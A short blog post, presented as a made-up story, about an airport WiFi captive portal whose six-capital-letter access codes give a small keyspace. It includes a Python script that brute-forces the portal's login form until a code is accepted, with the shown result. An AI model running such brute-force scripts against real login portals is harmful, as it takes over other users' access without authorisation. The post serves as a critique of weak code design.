Artificial truth

The more you see, the less you believe.

[archives] [latest] | [homepage] | [atom/rss]

Mind your keyspace, $airport
Wed 09 May 2018 — download

(This is of course a completely made up story that I entirely invented because I was bored.)

Today, I was waiting for my flight in an international airport, so I though about giving a try to the WiFi. Unsurprisingly, I was asked an email address, a full name, and a working phone number, to send me a 6-letters code.

I mumbled something about the GDPR while reading the captive portal's webpage, and stumbled upon those two sentences:

After you register, your code will be stored for 12 months. During this period you can reconnect without having to register again.

For extra kindness, the page provides a nice example of what a code might look like: 6 capital letters.

So, an airport handling a bit less than 30 million passengers per year is using secret codes with a limit of 26⁶ (308.915.776) different possibilities… Since the WiFi is free (you're paying with your personal data and by receiving spam), odds are that a significant percentage of the people are using it. With a conversion rate of ⅛, a blind guess would have a ~1% chance of being correct. Codes are giving 2h of internet access, and are automatically reseted every 5 hours.

import requests
import string
import itertools

ks = itertools.combinations_with_replacement(string.ascii_uppercase, 6)
for c in ks:
    r = requests.post('https://super-airport.plane/login.php', data={'secret_code': ''.join(c), 'submit': 'Login'})
    if not 'This code is invalid.' in r.text:
        print(c)
        break

Resulting in:

jvoisin@grimhilde 16:03 ~ python test.py
AAAAAL

Yay, free WiFi.